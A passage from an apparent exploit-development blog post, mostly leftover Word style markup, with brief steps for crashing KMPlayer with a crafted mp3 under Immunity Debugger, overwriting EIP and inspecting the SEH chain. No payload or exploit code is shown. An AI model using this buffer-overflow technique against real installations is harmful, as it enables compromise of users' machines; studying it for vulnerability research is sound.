UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--><span style="font-size: 11pt;">Run KMPlayer, attach it to Immunity Debugger and open malicious mp3 file in KMPlayer.</span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-sZYw8z8MVc4/Tgwk3Uw6gBI/AAAAAAAAAVI/CQRyB7B-Ho0/s1600/basic-crash.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://1.bp.blogspot.com/-sZYw8z8MVc4/Tgwk3Uw6gBI/AAAAAAAAAVI/CQRyB7B-Ho0/s400/basic-crash.JPG" width="400" /></a></div><br />
<span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"> </span><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"><span style="font-family: inherit;">The KMPlayer crashes with EIP overwritten with 41414141. This is already exploited in mentioned exploits. Let’s check the SEH chain. Go to "View" and select "SEH".</span></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-x0Kf1Ep5V2k/Tgwk3pRVFQI/AAAAAAAAAVM/8W49pYEwv-A/s1600/basic-crash-seh.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-x0Kf1Ep5V2k/Tgwk3pRVFQI/AAAAAAAAAVM/8W49pYEwv-A/s400/basic-crash-seh.JPG" width="400" /></a></div><span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"> </span><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
